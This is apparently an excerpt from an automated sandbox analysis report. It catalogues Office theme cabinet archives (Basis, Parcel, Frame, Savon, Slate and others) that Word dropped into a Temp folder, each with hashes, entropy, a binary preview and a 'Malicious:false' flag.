                                                                                    File Type:Microsoft Cabinet archive data, many, 279287 bytes, 2 files, at 0x44 +A "Basis.thmx" +A "content.inf", flags 0x4, ID 55632, number 1, extra bytes 20 in head, 18 datablocks, 0x1503 compression
                                                                                    Category:dropped
                                                                                    Size (bytes):295527
                                                                                    Entropy (8bit):7.996203550147553
                                                                                    Encrypted:true
                                                                                    SSDEEP:6144:nwVaEqsf23c9shf6UyOGgDWDn/p3fd+zkPWnvGL3n9bQnkmVheyqtkl:MlPfW6sVEDn/pPdhWnvGL36zyyqal
                                                                                    MD5:9A07035EF802BF89F6ED254D0DB02AB0
                                                                                    SHA1:9A48C1962B5CF1EE37FEEC861A5B51CE11091E78
                                                                                    SHA-256:6CB03CEBAB2C28BF5318B13EEEE49FBED8DCEDAF771DE78126D1BFE9BD81C674
                                                                                    SHA-512:BE13D6D88C68FA16390B04130838D69CDB6169DC16AF0E198C905B22C25B345C541F8FCCD4690D88BE89383C19943B34EDC67793F5EB90A97CD6F6ECCB757F87
                                                                                    Malicious:false
                                                                                    Preview:MSCF.....B......D...............P............B..p?..........{.................M.. .Basis.thmx...........M.. .content.inf.`g..td..[...............5..$..WM.....R.......H\.+\./^...x.^..h..MU..\........v........+......g...$.......g.....~....U].7..T..1k.H...1...c.P.rp.6K..&......,.............U4.WoG.w.....;.....v..922.;]..5_-]..%E]b..5]... (..H..II..ttA4Q..BI!|...H.7J.2D....R.......CXhi`n....6..G.~&.[..N...v..Z"t.a..K..3..).w...._@.}.}.v.......4......h....R;.8.c&.F...B^....Q.....!Bm2...F.`.......M;...#.{....c...?...e...6t..C.-.E.V.v%I..H.....m.n...$D.....vU'.....=6}~...Gw...Y..?.@......G.....k......z...5d.h......1.}..O*;e..t......Y.0...3.v).X.-.2.....~....14.[.w=I....hN....eD..7G.u.z..7.do..!....d..o.wQ.:....@/.^..<e.-..=\.....6.C.'.rW$..Cp.M3.u6z......Q.F.9.5....juc..I...m4]7L....+n......).t......2[.3.p.:.....O5y..wA........^..!..H....{..S.3w.!&.'.;...(..|m.x.S..Z.j..3...n..WU...../w.......xe=.+.D...x..qy.S.....E..... ...uu.`.,..<.6[p

                                                                                    C:\Users\user\AppData\Local\Temp\cabE706.tmp

                                                                                    Download File
                                                                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                    File Type:Microsoft Cabinet archive data, many, 214772 bytes, 2 files, at 0x44 +A "content.inf" +A "Parcel.thmx", flags 0x4, ID 26500, number 1, extra bytes 20 in head, 19 datablocks, 0x1503 compression
                                                                                    Category:dropped
                                                                                    Size (bytes):230916
                                                                                    Entropy (8bit):7.994759087207758
                                                                                    Encrypted:true
                                                                                    SSDEEP:6144:OTIPtMXmJWnzPS3pqnkeuJXW+FNx1a72rLiQxEBTR:750nz63/FJRFLISnp+Bt
                                                                                    MD5:93FA9F779520AB2D22AC4EA864B7BB34
                                                                                    SHA1:D1E9F53A0E012A89978A3C9DED73FB1D380A9D8A
                                                                                    SHA-256:6A3801C1D4CF0C19A990282D93AC16007F6CACB645F0E0684EF2EDAC02647833
                                                                                    SHA-512:AA91B4565C88E5DA0CF294DC4A2C91EAEB6D81DCA96069DB032412E1946212A13C3580F5C0143DD28B33F4849D2C2DF2214CE1E20598D634E78663D20F03C4E6
                                                                                    Malicious:false
                                                                                    Preview:MSCF.....F......D................g...........F...?..........|..................L.. .content.inf.zG.........L.. .Parcel.thmx.>2...R..[...0...........7....B+...BH....{...^.../.....B{...1....+".....<.....$........{.......sD"..j...}... P..w..U..f...6.x8. ...C..F.q.7....T.6p......B.P..L..g......A..43.W`.....{{...u.4...:.bb.4"X..m..)$..@(H. H.tBPTF..,.&.B.'...6..2...n..c%...Z@.(.@.......(.<i.i....P......?......o.......F.M.L......i.....C..7..../.....MQ.0..l.U.s.Fu.......1...p.;.(.}..ogd..<.._.Z......._.......O.J......97...~<...4.c....i..........'k.5.......Q.$..C..E... ..5.7....N.a.[ns6hi..kM....?....X......*9q...!O\....0....n.^s.9.6..............;. ..r...rf..C6z..v #.H...O...v/.sl....J.m%.L.Dp.e....*uO..g.y....f...].5.*........W.....h^[..w.|.=.ru.|.M..+.-.B...D.Ma....o.<X SnI....l...{..G..,..y5\W.@..y.;.y ...M..l.....e..A...d.e!.E..3.......k1.......6gY).../....pQ..?..s.W.)+R.S5..../.0..vz.^.......k.....v..9..A.NG...N~#..$.B...*s,(.o.@.ar.!.J.....

                                                                                    C:\Users\user\AppData\Local\Temp\cabE747.tmp

                                                                                    Download File
                                                                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                    File Type:Microsoft Cabinet archive data, many, 252241 bytes, 2 files, at 0x44 +A "content.inf" +A "Frame.thmx", flags 0x4, ID 34169, number 1, extra bytes 20 in head, 16 datablocks, 0x1503 compression
                                                                                    Category:dropped
                                                                                    Size (bytes):271273
                                                                                    Entropy (8bit):7.995547668305345
                                                                                    Encrypted:true
                                                                                    SSDEEP:6144:zfdvQnJMwXse4Vradf3mrC7woyWbjKlCVC7K:zfJwJse4VrS1AK
                                                                                    MD5:21437897C9B88AC2CB2BB2FEF922D191
                                                                                    SHA1:0CAD3D026AF2270013F67E43CB44F0568013162D
                                                                                    SHA-256:372572DCBAD590F64F5D18727757CBDF9366DDE90955C79A0FCC9F536DAB0384
                                                                                    SHA-512:A74DA3775C19A7AF4A689FA4D920E416AB9F40A8BDA82CCF651DDB3EACBC5E932A120ABF55F855474CEBED0B0082F45D091E211AAEA6460424BFD23C2A445CC7
                                                                                    Malicious:false
                                                                                    Preview:MSCF....Q.......D...............y...........Q...XJ..........{..................M.. .content.inf.(..........M.. .Frame.thmx.1....b..[.........B.....6....ZZ}....BH..-D..}..V.V-........Z..O.....H.f..........;..@d.`......!..=;.,bp..K.q....s.y....D.qZ)p......D...r.S....s=B.4.).8B....4.a6 ...~........."....#.....}....n.Q.1cH.%c/.U....E..E...!..Da*.p....X..G..:.....1.@.....W.'...._........W.c...<.v.k.....&.8......?.h.>d._:-.X.......9..tL}........3.;.N3.D~......>.^?..|:...}......oT.z.......w..[..}:...._fu........Kk.......L..9..p..e..^......K.%...Mapqhvv..E&.^.....[...9|"l...9...U......!..w..Nya...~C.yx...w.K..q.z.j.W?t.......DY.x.S2.....]..na.Qj...X.K..^...S.hK.W...Z....s.0...NF...8C.......j.'Zc...k.%...l....S.....OW..o.Qf.x...X.;<.rO].....W.m.e....T.1.6........".....Q.3........l..v.."..I...&......w..4vE...c.s[.3.m..8.q$.....a...)...&:6..,..#..?....;.!.....~.UP.r=.}h.&U......X...]..X.e\u.G<....E....lG.@.*Z...10.D@.]....z+-.S....p..Y.PK.:.S..p.....1E`..-

                                                                                    C:\Users\user\AppData\Local\Temp\cabE823.tmp

                                                                                    Download File
                                                                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                    File Type:Microsoft Cabinet archive data, many, 704319 bytes, 2 files, at 0x44 +A "content.inf" +A "Wood_Type.thmx", flags 0x4, ID 5778, number 1, extra bytes 20 in head, 51 datablocks, 0x1503 compression
                                                                                    Category:dropped
                                                                                    Size (bytes):723359
                                                                                    Entropy (8bit):7.997550445816903
                                                                                    Encrypted:true
                                                                                    SSDEEP:12288:NPnBZX7wR3tMwYqNDQGnXTtfzO5U7yo6O7bLhe8yE3LLDok4a:JBMbYE7xzO5U917bLh/DL3oJa
                                                                                    MD5:748A53C6BDD5CE97BD54A76C7A334286
                                                                                    SHA1:7DD9EEDB13AC187E375AD70F0622518662C61D9F
                                                                                    SHA-256:9AF92B1671772E8E781B58217DAB481F0AFBCF646DE36BC1BFFC7D411D14E351
                                                                                    SHA-512:EC8601D1A0DBD5D79C67AF2E90FAD44BBC0B890412842BF69065A2C7CB16C12B1C5FF594135C7B67B830779645801DA20C9BE8D629B6AD8A3BA656E0598F0540
                                                                                    Malicious:false
                                                                                    Preview:MSCF....?.......D...........................?...`J..............3..............M.. .content.inf..+.........M.. .Wood_Type.thmx......r..[.........................!.wwwwqwwwwwwwwwww..."....+......nR..x..\..w..r.5R.....(|.>.$e3.!..g....f..`9NL......o./.O.bxI...7.....|........6.n."J.....4^g.........?...................o.......s3.....8. .T.j...._.Z.Q.t.k,(o.c.t.......?Z....`o........?.a....6.)....6b..../.t...........Mz....q}......C.......+{.......o...K.tQjt............7.._....O.....\....` ..............@..`....%..t....V.]........m..m....u..1.yr;..t..F.'..+{....zqvd.g._..$H..Vl...m..../....g..rG.....:*......8....h...[...a06...U.W....5.Z.W..1I..#.2.....B3...x....$PRh...\{J.c.v.y..5+Y.W.N..hG......<..F..W.d8_....c...g....p|7.]..^.o.H.[$Zj..{4......m.KZ..n.T%...4.Z..Y."q7?kuB......U....).~.......W%..!.e.U.mp.o...h...?.w...T.s.YG#......Y.}....Z.O.i.r,...n..4.\....P..m..=....f........v....g....j...*.wP..4.VK.y.z...C..oum.b.1......?.Z.>.7.!?......A..Q>..Z....-

                                                                                    C:\Users\user\AppData\Local\Temp\cabE883.tmp

                                                                                    Download File
                                                                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                    File Type:Microsoft Cabinet archive data, many, 533290 bytes, 2 files, at 0x44 +A "content.inf" +A "Parallax.thmx", flags 0x4, ID 64081, number 1, extra bytes 20 in head, 29 datablocks, 0x1503 compression
                                                                                    Category:dropped
                                                                                    Size (bytes):550906
                                                                                    Entropy (8bit):7.998289614787931
                                                                                    Encrypted:true
                                                                                    SSDEEP:12288:N4Ar9NyDhUQM0Hk86V1YnOIxQ9e6SJbj2OjK:jAG8wa5Qw6SZ2Oj
                                                                                    MD5:1C12315C862A745A647DAD546EB4267E
                                                                                    SHA1:B3FA11A511A634EEC92B051D04F8C1F0E84B3FD6
                                                                                    SHA-256:4E2E93EBAC4AD3F8690B020040D1AE3F8E7905AB7286FC25671E07AA0282CAC0
                                                                                    SHA-512:CA8916694D42BAC0AD38B453849958E524E9EED2343EBAA10DF7A8ACD13DF5977F91A4F2773F1E57900EF044CFA7AF8A94B3E2DCE734D7A467DBB192408BC240
                                                                                    Malicious:false
                                                                                    Preview:MSCF....*#......D...............Q...........*#...D..........~..................M{. .content.inf............M{. .Parallax.thmx.9... y..[......(..b.P...E.Q*.R.".RTH.%.T..F......u.{.*+.P.....FK*0].F...a{...D4`D..V.../.P,....2.Mx...u......0...E...{A-"J...)jl_.A..T......u.Y....ZG:....V.A.#~.. ..6..............o..X..<.... .......C.ce.f!nA.).p...p........n..................'6w6H6s.j....l...{?.h..........]..l.....v....%..l}A..................3...W_73.j......6...F.../..qG.?........H..).........7.&km....`m2..m.W.q.<../~<..6*.78..X~.e+..CC*w...T...6....AB..l..._.f......s.e....2....H..r.R.Z....a.,..\Q.q..._SJJ....7.S.R....=f..>....9=....NnC.....].-...\..Z..q..j...q.....Nj..^'..k...Zl.~PRvpz.J..+.C...k.z.w=l.#.............n...C..s.kM.@B{..vL.e....E..(/......f...g..=..V...}...).=s.....y!.,...X.[..[.....\31}..D%...%..+G66.j.v./.e9...P;.o.y..U+...g.g.S.../..B._L..h...Oi.._...:..5ls>>........n6.F.Q..v>..P.r:.a..Z....a...x..D....N...i..=L.u......<;Nv.X/*.

                                                                                    C:\Users\user\AppData\Local\Temp\cabE960.tmp

                                                                                    Download File
                                                                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                    File Type:Microsoft Cabinet archive data, many, 624532 bytes, 2 files, at 0x44 +A "content.inf" +A "Quotable.thmx", flags 0x4, ID 13510, number 1, extra bytes 20 in head, 30 datablocks, 0x1503 compression
                                                                                    Category:dropped
                                                                                    Size (bytes):640684
                                                                                    Entropy (8bit):7.99860205353102
                                                                                    Encrypted:true
                                                                                    SSDEEP:12288:eV7ivfl+kbkIrWu+2aoRjwv/cSUWauGPo2v65s4QqcT3ZCCz6CSj8aC:fdhr1+3y4MWaC2CO4V+3ZCCDsO
                                                                                    MD5:F93364EEC6C4FFA5768DE545A2C34F07
                                                                                    SHA1:166398552F6B7F4509732E148F93E207DD60420B
                                                                                    SHA-256:296B915148B29751E68687AE37D3FAFD9FFDDF458C48EB059A964D8F2291E899
                                                                                    SHA-512:4F0965B4C5F543B857D9A44C7A125DDD3E8B74837A0FDD80C1FDC841BF22FC4CE4ADB83ACA8AA65A64F8AE6D764FA7B45B58556F44CFCE92BFAC43762A3BC5F4
                                                                                    Malicious:false
                                                                                    Preview:MSCF............D................4...............?..........~..................M. .content.inf."..........M. .Quotable.thmx..^.u.n..[...............&...U..F.......UU.M.T5.UUQS..j..#>43fD.....`....Vr......19'...P..j.-...6n.0c....4$.c....$.4.k3aQ$.lCN.#.[.."qc....,Z...,Qt@!.@...... ...H.......9.9.y.{....[.`..s3.5.....B....W.g.d...[uv.UW..............P.8.(.?......3.....'/F...0...8.P. .O..B....K...g..L.......#s...%..|4.i....?.3b.".....g...?.........2.O23..'..O~.+..{...C.n.L......3......Y.L...?K...o......g....@.]...T..sU.....<.._.<G.......Tu.U2..v.&..<..^..e.].cY;..9.%..}...I.y.;...WM...3>.:.=.|.-.AtT2OJ.I.#...#.y....A....\]$r...lM.%5.."...+7M..J.....c...".&$.... Y.r.B;..81B. +H...b....@7K.*.F.Z...v..=..ES.f.~.."...f..ho.X.E.a`~*...C>.&..@\.[....(.....h..]...9&...sd.H .1.x.2..t.rj..o..A..^qF.S9.5.....E.{...C|.w.c/V...0Q.M...........O.7;A4u...R..Z.B.7a.C`....p.z.....f!|.u.3t....2e.wWH..'7p....E_...e.._;..k....*&E.^.f=V..{*..al.y:.4a...+.g...-..>e

                                                                                    C:\Users\user\AppData\Local\Temp\cabE9B0.tmp

                                                                                    Download File
                                                                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                    File Type:Microsoft Cabinet archive data, many, 682092 bytes, 2 files, at 0x44 +A "Berlin.thmx" +A "content.inf", flags 0x4, ID 46672, number 1, extra bytes 20 in head, 30 datablocks, 0x1503 compression
                                                                                    Category:dropped
                                                                                    Size (bytes):698244
                                                                                    Entropy (8bit):7.997838239368002
                                                                                    Encrypted:true
                                                                                    SSDEEP:12288:bUfKzAwwP7XAMWtr4FvMRt4lX0hnBdThiSb32+TdysrQgn7v4EemC6:sr7AMkJ34xu1bm4ZrQaY6
                                                                                    MD5:E29CE2663A56A1444EAA3732FFB82940
                                                                                    SHA1:767A14B51BE74D443B5A3FEFF4D870C61CB76501
                                                                                    SHA-256:3732EB6166945DB2BF792DA04199B5C4A0FB3C96621ECBFDEAF2EA1699BA88EE
                                                                                    SHA-512:6BC420F3A69E03D01A955570DC0656C83C9E842C99CF7B429122E612E1E54875C61063843D8A24DB7EC2035626F02DDABF6D84FC3902184C1EFF3583DBB4D3D8
                                                                                    Malicious:false
                                                                                    Preview:MSCF....lh......D...............P...........lh...?..........|..................M. .Berlin.thmx............M. .content.inf..lH.lj..[...............7.I..)........P..5x.B/^y5.xk^^......D.F........s....y...?D.....*.....&....".o..pl..Q.jm?_...6......=%.p.{.)S..y...$......,4..>#.........)..."-....K....4.E...L=.......4..p.c..nQ.0..ZO.#.....e.N..`U......oS....V..X[t.E)|.h..R....$..}.{.F.7....^.....w.,...5rBR.....{.......mi...h.b......w+..;.hV......q..(.7&.Z.l...C."j........[-E4h.....v&..~.p$|\X...8.....Fj'%,.)6w...u|C..,y..E..`*Up../(....2.(....Z.....,.'...d..s..Z....5.g.?Nq..04...f...D.x....q+.b.."v`{.NL....C..... ..n......1N+.I.{W9....2r.0...BaC.....O..=...k..."..8.D\jK.B...Aj....6,B..2...I.. B..^.4..1.K+.....DP...Mr....9..x[...>........?.Zd..'._2.._..>..'.F..#.w...2..~.|........q_Wy.W.....~..Qex.km/..f......t.q..p..gm.|.x.... ,.#\Z....p....a.}...%..v.J.Es......I.b.P?...0......F.x....E..j..6.%..E..-O.k...b .^.h.Cv...Z....D.n.d:.d.F..x...[1...B..

                                                                                    C:\Users\user\AppData\Local\Temp\cabEAEB.tmp

                                                                                    Download File
                                                                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                    File Type:Microsoft Cabinet archive data, many, 937309 bytes, 2 files, at 0x44 +A "content.inf" +A "Gallery.thmx", flags 0x4, ID 44349, number 1, extra bytes 20 in head, 34 datablocks, 0x1503 compression
                                                                                    Category:dropped
                                                                                    Size (bytes):953453
                                                                                    Entropy (8bit):7.99899040756787
                                                                                    Encrypted:true
                                                                                    SSDEEP:24576:9B1Onw3vg7aeYPagzbJ5Vhv6LnV2Dhl7GEYqVjcyd:vww3o7BYPJbJ5Vh6UCqZfd
                                                                                    MD5:D4EAC009E9E7B64B8B001AE82B8102FA
                                                                                    SHA1:D8D166494D5813DB20EA1231DA4B1F8A9B312119
                                                                                    SHA-256:8B0631DA4DC79E036251379A0A68C3BA977F14BCC797BA0EB9692F8BB90DDB4D
                                                                                    SHA-512:561653F9920661027D006E7DEF7FB27DE23B934E4860E0DF78C97D183B7CEBD9DCE0D395E2018EEF1C02FC6818A179A661E18A2C26C4180AFEE5EF4F9C9C6035
                                                                                    Malicious:false
                                                                                    Preview:MSCF....]M......D...............=...........]M...?..........}..."..............Li. .content.inf............Li. .Gallery.thmx.].(.Vq..[.....0Y..........v.....w.wwwww.wwwwww.w.....".83....y8..mg...o*..U..N(..@uD.:O<........{.G....~~.....c.c.5..6./|G .@#1O.B.............PT@...b.d.~..U....B.{.........0.H.....`.H.`..'S.......Ic..W..x...z....... .........g......._....o......S......p...$....._........._...K......x..?.6.U~...'./.r.................../.......5.8..2........2b.@j ....0.........``....H... ,5...........X........|..Y.QoiW..*|.......x.sO8...Yb....7...m..b.f.hv..b......=...:Ar.-...[..A\.D..g..u....].9..M...'.R-`.....<..+.....]...1.^..I.z..W{.._....L.. ...4;..6O.....9,.-.Vt+b/$7..}.O05.Y...-..S.....$*.....1."Z.r;.!..E.mMN..s .U...P%.[.P...cU...j...h.d.../.s..N/..:..X*...p5.7\}h.Q ..._.F.X.C..z$.nV..+.k..|.@.L...&.........^#.G.a..x..w!wx.8e+..E. i..$?9..8...:......|..[."..y..&y..?...W....s..._...3Z0c.....i.q.........1c.jI....W..^%xH.._...n.......&J..

                                                                                    C:\Users\user\AppData\Local\Temp\cabEAFB.tmp

                                                                                    Download File
                                                                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                    File Type:Microsoft Cabinet archive data, many, 1081343 bytes, 2 files, at 0x44 +A "Circuit.thmx" +A "content.inf", flags 0x4, ID 11309, number 1, extra bytes 20 in head, 45 datablocks, 0x1503 compression
                                                                                    Category:dropped
                                                                                    Size (bytes):1097591
                                                                                    Entropy (8bit):7.99825462915052
                                                                                    Encrypted:true
                                                                                    SSDEEP:24576:UE9BMy98gA4cDWHkSrDans3MfEE6w8OaVuCibol0j41dwD:UE9Bdy3D4keQWt7w85VuVoaj4/Q
                                                                                    MD5:BF95E967E7D1CEC8EFE426BC0127D3DE
                                                                                    SHA1:BA44C5500A36D748A9A60A23DB47116D37FD61BC
                                                                                    SHA-256:4C3B008E0EB10A722D8FEDB325BFB97EDAA609B1E901295F224DD4CB4DF5FC26
                                                                                    SHA-512:0697E394ABAC429B00C3A4F8DB9F509E5D45FF91F3C2AF2C2A330D465825F058778C06B129865B6107A0731762AD73777389BB0E319B53E6B28C363232FA2CE8
                                                                                    Malicious:false
                                                                                    Preview:MSCF............D...............-,..............x?..........}...-...RU.........M. .Circuit.thmx.....RU.....M. .content.inf.g...&|..[......=..R.....=.*,.!QA?h..Q.!....Uk!.HJ.......VKuk.....q.w.w.U.....;...K.@.URA..0..B..|rv.ND(.`{..@.1.}...s?.....-...O.(V.w..1..a.....aW...a.Z..aX....5.I...!..........(. ./.d...me.( ..f.........w.......Xp.s....c..vB.98.....C.J......V ..ML.M...B.n.>...|....u!.5@t..q4....(K...u qL.S....>/%v%.2..TF.].e..'..-..L.N..c].a..(WU\o.%^..;...|o.6..L..[..;&....^p.Lu.sr,-.R=.:.8.>VOB...:.?$.*h.o....Zh.h....`.B.c.../K......b^...;2..bY.[.V.Q8....@..V7....I0c.cQN7..I.p..}..!..M....1K....+....9.2......a..W.V..........;.J .i......]%O.-......CeQ.0.c....MbP3.0.w..8w..Y...|...H;#.J.+M......>.`y..aWk|.i.BF.pJv;.....S..6....F.....RLG~..........J.=......"..........H.....h..o...u........M.6F?.F.p.B.>./*l....J.R..#P.....K......<iu..gm^..n...#c..zO"7M.O......4'>A..(.E.Cy.N.)....6.tx.r[.....7.......m.t..E?.....5.5.6.\..{.V.T.D.j..=~a^.I

                                                                                    C:\Users\user\AppData\Local\Temp\cabEB7B.tmp

                                                                                    Download File
                                                                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                    File Type:Microsoft Cabinet archive data, many, 1049713 bytes, 2 files, at 0x44 +A "content.inf" +A "Savon.thmx", flags 0x4, ID 60609, number 1, extra bytes 20 in head, 37 datablocks, 0x1503 compression
                                                                                    Category:dropped
                                                                                    Size (bytes):1065873
                                                                                    Entropy (8bit):7.998277814657051
                                                                                    Encrypted:true
                                                                                    SSDEEP:24576:qehtHA3nsAOx7yN7THwxdGpkw8R60aTcua5U4c:hhmnsBMNAxdGpV5za5Uv
                                                                                    MD5:E1101CCA6E3FEDB28B57AF4C41B50D37
                                                                                    SHA1:990421B1D858B756E6695B004B26CDCCAE478C23
                                                                                    SHA-256:69B2675E47917A9469F771D0C634BD62B2DFA0F5D4AF3FD7AFE9196BF889C19E
                                                                                    SHA-512:B1EDEA65B6D0705A298BFF85FC894A11C1F86B43FAC3C2149D0BD4A13EDCD744AF337957CBC21A33AB7A948C11EA9F389F3A896B6B1423A504E7028C71300C44
                                                                                    Malicious:false
                                                                                    Preview:MSCF....q.......D...........................q... ?..........{...%..............M. .content.inf.Q_.........M. .Savon.thmx...O>.o..[..............&.5....UUcC.C....A...`TU...F....".54.E.....g.-.7-D....1g...p.6......@..w(....h'?.....(..........p..J.2n$4.........A......?...........@.C.W.R.5X..:..*..I..?....r.y..~!.....!.A.a...!........O.........5.x<C...?.?....C.C.......'....F../....../.$................4.7...................P...(.w.}6.........7.....01.1r........._..?.............'.._..JOx.CFA<.........*0..2.?...>F.../...;..6-8..4...8&yb....".1%..v'..N...x......}.gYb..~L.....f[..!......Y.G.....p..r...?.p...F.Vy.....o.Whll...+...M.V...:.]...B.%.H....n..@.].zaVxf...y{.@....V.t.W....$Kp-.....7W.J..h..0A3mK.=.ub..R...W......*'T2..G#G,.^..T..XZu...U. ...76.d..#.I.JB.v...d...%.....6..O.K.[.:.L.\.....1.D..2a.>f......X...b5...ZgN.u.f...a!..."...sx....>..?.a.3.8.^._q..JS1.E..9..Lg.n.+....lE.f:j.9)Q..H1=..<.R.......{c>:.p[..S.9h.a.gL.U....8.z..z.!.....2I.~.b..2..c...

                                                                                    C:\Users\user\AppData\Local\Temp\cabEDCF.tmp

                                                                                    Download File
                                                                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                    File Type:Microsoft Cabinet archive data, many, 1291243 bytes, 2 files, at 0x44 +A "content.inf" +A "Droplet.thmx", flags 0x4, ID 47417, number 1, extra bytes 20 in head, 54 datablocks, 0x1503 compression
                                                                                    Category:dropped
                                                                                    Size (bytes):1310275
                                                                                    Entropy (8bit):7.9985829899274385
                                                                                    Encrypted:true
                                                                                    SSDEEP:24576:NN3M9UHpHZE4aubaPubP3M6d71FdtmFAjq+54/79LVzG+VnS:NN3M9UJHZE4abPyU4JtmFCq+q/7JlVS
                                                                                    MD5:9C9F49A47222C18025CC25575337A965
                                                                                    SHA1:E42EDB33471D7C1752DCC42C06DD3F9FDA8B25F0
                                                                                    SHA-256:ADA7EFF0676D9CCE1935D5485F3DDE35C594D343658FB1DA42CB5A48FC3FC16A
                                                                                    SHA-512:9FDCBAB988CBE97BFD931B727D31BA6B8ECF795D0679A714B9AFBC2C26E7DCF529E7A51289C7A1AE7EF04F4A923C2D7966D5AF7C0BC766DCD0FCA90251576794
                                                                                    Malicious:false
                                                                                    Preview:MSCF...........D...............9..............XJ..........}...6..............M.. .content.inf............M.. .Droplet.thmx..m7.>J..[...............2.QQPIj.*.."o^R.H5*^...^(e.W...R..x..^`..m...."..+.....{o.......Q.-....$V.N>...T]..L.... ..N.h..dOY.......S......N.%.d..d....Y.....e..$...<.m...`............@....=.z..n..[...,G..1Fn.qPDH{C<...3.Q...2..r..*...E.E.E.ErM"&a..'..W....:...?I..<.I..6o.`.d.?!..!..._.4\.._.E..).._O.S....; ..#..p.H.....c....o\.K..?$U.e.........!...J.v.....gNe._..[....#A.O.n_.....gm:P._.........{@..-g..j.69b.NH.I.$Hk?.6.n...@......'.C.._.U..:*,j.-G.....e.#.Sr.t.L......d[.[...s.....rx.3.F[.5o..:....K*.x..)M.fb...3IP.&h.Q.VX^%U.......x..l......@6.k.P..zSW.?....F..[L...4..b.l.w."&.....`.j...i.5}".~.-.....{\.:...o.'H\*+)....3.Y......\...f:.;....e........4't7..f...w..j...3....N..9`.J...P..?.....=3_.y]...f.<.......JM5.}Q/ .F.a..Z.._yh......V..>m .......a....f....!.hz..\.....F_..'z...,....h.=.......=.o..T....3.e..........$..g.2.

                                                                                    C:\Users\user\AppData\Local\Temp\cabEF67.tmp

                                                                                    Download File
                                                                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                    File Type:Microsoft Cabinet archive data, many, 1750009 bytes, 2 files, at 0x44 +A "content.inf" +A "Slate.thmx", flags 0x4, ID 28969, number 1, extra bytes 20 in head, 72 datablocks, 0x1503 compression
                                                                                    Category:dropped
                                                                                    Size (bytes):1766185
                                                                                    Entropy (8bit):7.9991290831091115
                                                                                    Encrypted:true
                                                                                    SSDEEP:24576:O/gjMj+RP9Q07h9F75a0BXjBccHMVk2Hq2SkGa0QglyZtxmdPP2LcSUtfgfp16Yx:kJ6RP9Q07/X5V7yVF0QgktxAPutUt0zP
                                                                                    MD5:828F96031F40BF8EBCB5E52AAEEB7E4C
                                                                                    SHA1:CACC32738A0A66C8FE51A81ED8E27A6F82E69EB2
                                                                                    SHA-256:640AD075B555D4A2143F909EAFD91F54076F5DDE42A2B11CD897BC564B5D7FF7
                                                                                    SHA-512:61F6355FF4D984931E79624394CCCA217054AE0F61B9AF1A1EDED5ACCA3D6FEF8940E338C313BE63FC766E6E7161CAFA0C8AE44AD4E0BE26C22FF17E2E6ABAF7
                                                                                    Malicious:false
                                                                                    Preview:MSCF............D...............)q..............0?..........{...H..............M.. .content.inf.;.#........M.. .Slate.thmx.p.+..P..[......U..............p..K.!.......*...K..w..v........=....D$r...B....6 ...X.F0..d..m.s...$$r........m.)6.m3....vXn.l..o...a...V......Ru.:=2M.........T.....4S`EP......\..r,..v...G.P......'._H0]..%_............X.P.,.............H.?.-.H..".......M..&..o....R........<......`...D.H.._.G.Qv..(.*.U,.9..D...."..T..i.e../.e.."....,S...o.X.....c./..V....Z..o.O..2....{...+... ....0.@J.R.Q.m.....{.....h?u.q.O{...l.d)..Yk`.....#...u.-.m..#CXwrz4..7.>......v.E:.#.oGSKS.TX.Chm.4aQ......avH..{..j+@6[k].....`c..W8..j.v.Zh.]....4......K..#Hzyd..K}.....H|<H..\(l...+..%Z......~.S:^..d>..1..H%..7N-v.....Wu.*..b^.B.....k0gc.2.{.!...E7.}3.d...{.Ye...&#f6...:2......v..&!..k0d.p.b...,..$.....Y..60...h.N}.r...<[./........{...Es..&.nf.....2.@Fh3.9.G....l.[.C..SD/6.H.K....}..m....M..........gl.P.]..I......5....e.c...V....P...[.=.......O.eq+

                                                                                    C:\Users\user\AppData\Local\Temp\cabEFC7.tmp

                                                                                    Download File
                                                                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                    File Type:Microsoft Cabinet archive data, many, 1865728 bytes, 2 files, at 0x44 +A "content.inf" +A "Damask.thmx", flags 0x4, ID 63852, number 1, extra bytes 20 in head, 68 datablocks, 0x1503 compression
                                                                                    Category:dropped
                                                                                    Size (bytes):1881952
                                                                                    Entropy (8bit):7.999066394602922
                                                                                    Encrypted:true
                                                                                    SSDEEP:49152:6Wp9u/ZAvKz7ZFCejPiSmYXKIr6kBwBUA:6W6Bn7ZFNiiKo2l
                                                                                    MD5:53C5F45B22E133B28D4BD3B5A350FDBD
                                                                                    SHA1:D180CFB1438D27F76E1919DA3E84F307CB83434F
                                                                                    SHA-256:8AF4C7CAC47D2B9C7ADEADF276EDAE830B4CC5FFE7E765E3C3D7B3FADCB5F273
                                                                                    SHA-512:46AD3DA58C63CA62FCFC4FAF9A7B5B320F4898A1E84EEF4DE16E0C0843BAFE078982FC9F78C5AC6511740B35382400B5F7AC3AE99BB52E32AD9639437DB481D1
                                                                                    Malicious:false
